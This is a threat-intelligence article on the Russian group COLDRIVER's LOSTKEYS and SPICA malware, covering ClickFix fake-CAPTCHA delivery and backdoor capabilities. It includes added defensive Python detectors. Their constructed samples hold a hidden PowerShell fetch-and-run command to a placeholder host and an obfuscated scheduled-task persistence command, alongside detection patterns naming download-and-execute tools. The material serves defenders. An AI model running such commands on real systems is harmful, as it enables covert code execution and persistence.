
Lostkeys Malware: Russian Group Coldriver Targets Western Officials in Espionage Campaign

 

A new wave of cyber espionage has emerged: Russian state-backed operators are deploying a malware strain that Google tracks as LOSTKEYS against Western officials, journalists and NGOs. Google's Threat Intelligence Group attributes the malware to COLDRIVER, also tracked as UNC4057, Star Blizzard and Callisto, a threat actor assessed to be associated with Russia's Federal Security Service (FSB), the successor to the KGB.

COLDRIVER has traditionally focused on credential-phishing operations, so LOSTKEYS marks a notable step beyond phishing and into deeper access on victim systems. The malware is deployed selectively and reserved for high-value individuals such as political advisers, think-tank staff, journalists and people with known connections to Ukraine.

Google observed LOSTKEYS activity in January, March and April 2025, with earlier samples suggesting its use may go back to December 2023. The attack begins with a fake CAPTCHA page whose "verification" steps tell the victim to copy a PowerShell command and paste it into the Windows Run dialog (Win+R). This technique, known as "ClickFix", sidesteps e-mail and download filtering because the victim, not an attachment, launches the command; it exploits user behaviour rather than a software vulnerability.

Once executed, the script contacts a command-and-control server and retrieves the next stage, with subsequent payloads tailored to each victim. The second stage includes an anti-sandbox check: it computes a hash of the host's display resolution and stops if the value matches one of a few hard-coded resolutions associated with virtual machines used by analysts and researchers. If the host passes, the final stage is delivered: a Visual Basic Script that collects files with specific extensions from specific directories, system information and the list of running processes, and sends them to the attackers' server. The exfiltrated data is encoded with a substitution cipher that uses a unique pair of keys for each infected machine.
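Because the ClickFix step depends on the victim pasting a command into Win+R, the Run dialog's history (the RunMRU registry key, which Windows keeps per user) is a good place to look during triage even after the PowerShell process is gone. The following is an added example, not code from the original post or from Google's report: it parses a constructed .reg export of that key, restores the most-recent-first order from MRUList, and scores each entry for the three traits of a pasted ClickFix one-liner. The sample command line and the captcha-check.example domain are placeholders.

```python
"""Offline triage of the Windows Run-dialog history for ClickFix-style launches.

Windows keeps the last commands typed into Win+R under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU, so a
pasted ClickFix command usually survives there after the process has exited.
Added example (not code from the original post or from Google's report);
the registry export below is constructed and the domain is a placeholder.
"""
import re

# Constructed .reg export.  Values "a".."z" hold one command each, suffixed
# with a literal "\1"; MRUList gives the most-recent-first order.  .reg files
# escape backslashes and quotes with a backslash, which is why "\1" shows as \\1.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="cab"
"a"="notepad\\1"
"b"="\\\\fileserver\\share\\1"
"c"="powershell -w hidden -ep bypass -c \"iex (iwr http://captcha-check.example/verify -UseBasicParsing).Content\"\\1"
'''

_VALUE_LINE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"\s*$', re.M)


def parse_run_mru(reg_text):
    """Return the Run-dialog commands, most recent first, unescaped and without
    the trailing '\\1' marker Windows appends to each entry."""
    values = {}
    for name, raw in _VALUE_LINE.findall(reg_text):
        values[name] = re.sub(r"\\(.)", r"\1", raw)  # undo .reg escaping
    order = values.pop("MRUList", "")
    return [values[c].removesuffix("\\1") for c in order if c in values]


# Three traits of a pasted ClickFix one-liner: an interpreter that accepts
# inline code, a hide-the-window/bypass-policy switch, and a fetch-and-run verb.
INTERPRETER = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|curl|certutil|msiexec|wscript|cscript)\b", re.I)
EVASION = re.compile(
    r"(?<!\S)-(w(indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass"
    r"|nop(rofile)?|noni(nteractive)?|e(nc|ncodedcommand|c)?(?!\w))", re.I)
REMOTE_CODE = re.compile(
    r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|downloadfile"
    r"|frombase64string|start-bitstransfer)\b|https?://", re.I)


def classify(command):
    """Score one Run-dialog entry.  A single trait (someone typing 'cmd') is
    normal; two deserve a look; all three is the ClickFix pattern."""
    hits = {
        "interpreter": bool(INTERPRETER.search(command)),
        "evasion": bool(EVASION.search(command)),
        "remote_code": bool(REMOTE_CODE.search(command)),
    }
    score = sum(hits.values())
    verdict = "clickfix" if score == 3 else "suspicious" if score == 2 else "benign"
    return {"command": command, "verdict": verdict, **hits}


def triage_run_mru(reg_text):
    """Classify every entry in a RunMRU export, most recent first."""
    return [classify(cmd) for cmd in parse_run_mru(reg_text)]


if __name__ == "__main__":
    for finding in triage_run_mru(SAMPLE_REG_EXPORT):
        print(f"{finding['verdict']:<10} {finding['command']}")
```

On a live host the same data comes from `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU out.reg`, and the RunMRU key of every user profile on the machine should be checked, not only the current one. The scoring is deliberately coarse: it is a triage filter for deciding which entries to read by hand, not a signature.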

LOSTKEYS appears to be a more refined successor to SPICA, the Rust backdoor that Google TAG attributed to COLDRIVER in January 2024. Both are built for data theft, but LOSTKEYS has a more elaborate multi-stage delivery chain and better obfuscation. Google also found earlier samples, dating to December 2023, that posed as the legitimate Maltego software and were delivered as executables rather than through PowerShell; it has not confirmed whether those samples belong to the same campaign or to a different actor reusing COLDRIVER's tooling.

This development highlights an alarming evolution in state-backed cyber operations, where advanced social engineering and stealth techniques are being increasingly used to infiltrate high-profile targets. As geopolitical tensions persist, the risks posed by such targeted cyber espionage campaigns are expected to grow.

ColdRiver APT: Google TAG Warns Russian APT Group Is Using a Custom Backdoor


Google has warned that a Russia-linked threat actor tracked as COLDRIVER, which has been expanding its targeting, has also been developing custom malware.

ColdRiver APT

The ColdRiver APT (also known as Seaborgium, Callisto, Star Blizzard and TA446) is a Russian cyber-espionage group that has been targeting government officials, military personnel, journalists and think tanks since at least 2015.

The group's long-running phishing and credential-theft campaigns have resulted in intrusions and data theft. Although researchers have observed campaigns against the Baltic, Nordic and Eastern European regions, including Ukraine, the group predominantly targets NATO member states.

Google TAG researchers warn that COLDRIVER is refining its tactics, techniques and procedures (TTPs) in order to evade detection.

TAG recently observed COLDRIVER using phishing campaigns to deliver bespoke malware, with PDF documents as the lure. Google disrupted these attempts by adding all known domains and file hashes to its Safe Browsing blocklists.

As far back as November 2022, TAG observed COLDRIVER sending targets PDF documents from impersonation accounts. The lure asks the recipient for feedback on an opinion piece or other article the sender is supposedly hoping to publish. When the target opens the PDF, its text appears to be encrypted.

If the target replies that they cannot read the document, the operators send a link to a supposed decryption tool hosted on their own website. Downloading and running that tool installs a backdoor, tracked as SPICA, and opens a decoy document so the victim sees what they expected.

“Once executed, SPICA decodes an embedded PDF, writes it to disk, and opens it as a decoy for the user. In the background, it establishes persistence and starts the main C2 loop, waiting for commands to execute,” reads TAG’s analysis. 

SPICA is a Rust backdoor that uses JSON over WebSockets for its C2 channel. It supports several capabilities, including:

  • executing arbitrary shell commands;
  • stealing cookies from Chrome, Firefox, Opera and Edge;
  • uploading and downloading files;
  • listing the contents of the filesystem;
  • enumerating documents and exfiltrating them in an archive;
  • a command named "telegram", whose functionality is unclear.

The backdoor establishes persistence through an obfuscated PowerShell command that creates a scheduled task named CalendarChecker.
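The scheduled task above is the persistence hook, and the post only says it is created by obfuscated PowerShell. One form of obfuscation defenders meet constantly is the `-EncodedCommand` switch, which hides the script body as base64 over UTF-16LE, so a detection that looks only at the visible command line never sees `schtasks /create`. The following is an added example, not TAG's code or anything from SPICA itself: it decodes such payloads in process-creation telemetry and flags the ones that register a scheduled task. The events are constructed in the shape of Sysmon Event ID 1 fields; the task name CalendarChecker is the one reported in the post, while the script bodies and paths are placeholders and the encoded-command form is an assumption about how the obfuscation might look.

```python
"""Decode PowerShell -EncodedCommand payloads from process-creation telemetry and
flag the ones that register a scheduled task.

Added example (not code from the original post or from Google TAG's analysis).
The events are constructed in the shape of Sysmon Event ID 1 fields; the task
name "CalendarChecker" is the one reported in the post, the script bodies and
paths are placeholders.
"""
import base64
import re
from typing import Optional


def encode_powershell(script: str) -> str:
    """powershell.exe -EncodedCommand takes base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> Optional[str]:
    """Inverse of the above; returns None for anything that is not a valid
    encoded command (bad base64, odd byte count, non-UTF-16 content)."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample: one obfuscated persistence command, one encoded but
# harmless admin script, and a plain schtasks query that must not alert.
MALICIOUS_SCRIPT = (
    "schtasks /create /f /sc minute /mo 10 /tn CalendarChecker "
    "/tr \"powershell -w hidden -c iex([IO.File]::ReadAllText('C:\\Users\\Public\\c.txt'))\""
)
BENIGN_SCRIPT = "Get-Date | Out-File C:\\Temp\\heartbeat.txt"
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"Image": PS_EXE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(MALICIOUS_SCRIPT)},
    {"Image": PS_EXE, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "powershell.exe -EncodedCommand " + encode_powershell(BENIGN_SCRIPT)},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks /query /tn \Microsoft\Windows\Defrag\ScheduledDefrag"},
]

# -e, -ec, -enc and -EncodedCommand are all accepted spellings of the switch.
ENC_FLAG = re.compile(r"(?<!\S)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
TASK_CREATE = re.compile(
    r"\bschtasks(?:\.exe)?\s+[/-]create\b|\bregister-scheduledtask\b|schedule\.service", re.I)
TASK_NAME = re.compile(r"(?:/tn|-taskname)\s+[\"']?([^\"'\s]+)", re.I)


def inspect_event(event: dict) -> dict:
    """Decode any encoded command, then search both the visible command line
    and the decoded script for scheduled-task creation."""
    cmd = event["CommandLine"]
    match = ENC_FLAG.search(cmd)
    decoded = decode_powershell(match.group(1)) if match else None
    effective = cmd if decoded is None else cmd + "\n" + decoded
    finding = {
        "image": event["Image"],
        "parent": event["ParentImage"],
        "encoded": match is not None,
        "decoded": decoded,
        "creates_task": bool(TASK_CREATE.search(effective)),
        "task_name": None,
    }
    if finding["creates_task"]:
        name = TASK_NAME.search(effective)
        finding["task_name"] = name.group(1) if name else None
    return finding


def find_task_persistence(events):
    """Return only the events that create a scheduled task, with the decoded
    script attached so an analyst can read what the task will run."""
    return [f for f in map(inspect_event, events) if f["creates_task"]]


if __name__ == "__main__":
    for f in find_task_persistence(SAMPLE_EVENTS):
        print(f"{f['image']} (parent {f['parent']}) creates task {f['task_name']!r}")
        print("  decoded:", f["decoded"])
```

The decoded script is kept in the finding on purpose: the task name alone is not enough to judge it, and the `/tr` action is what tells you whether the task is the benign maintenance job it is named after or a loader. Pairing this with Windows Security event 4698 (scheduled task created), which records the task XML regardless of how the task was registered, catches the cases where the command line was obfuscated in a way this decoder does not handle.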

Google believes COLDRIVER has been using SPICA since at least November 2022, although TAG itself only observed the backdoor in use from early September 2023.